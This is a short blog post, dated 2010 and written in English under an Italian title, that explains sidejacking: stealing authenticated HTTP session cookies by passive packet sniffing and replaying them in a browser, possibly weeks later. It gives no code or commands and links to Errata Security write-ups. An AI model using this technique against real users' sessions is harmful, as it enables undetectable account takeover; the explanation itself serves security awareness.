lunedì 29 marzo 2010

Sidejacking (ovvero come "infilarsi" in una sessione HTTP autenticata

Sidejacking is a form of “HTTP session hijacking” that works with “passive” eavesdropping.
HTTP session hijacking is where the hacker grabs your “session cookies”. Your session with the web server is identified with a unique cookie. This cookie is sent to your browser at the start of the session, and your browser echos it back from that point forward.

There are many forms of session hijacking. Some use cross-site scripting to grab them from your browser. Some use “man-in-the-middle” attacks to intercept the connection then resend it. The sidejacking method uses passive eavesdropping of cookies. Users collect cookies using a packet-sniffer, then import them into the browser. Unlike other methods of session hijacking, there is nothing the user can possibly see that would tell them their session is being hijacked. They can’t “View source” to find errant JavaScript (as they could with cross-site-scripting attacks). They can’t sniff their own traffic is see that it’s being changed (as in man-in-the-middle) attacks.

In addition, sidejacking allows for offline attacks. Session cookies last a long time, sometimes for years. That means a hacker could capture packets with a packet-sniffer at one point, then weeks later in another part of the world, import the cookies into the browser and access the session.

http://erratasec.blogspot.it/2007/08/sidejacking-with-hamster_05.html

http://erratasec.blogspot.it/2008/01/more-sidejacking.html
Posta un commento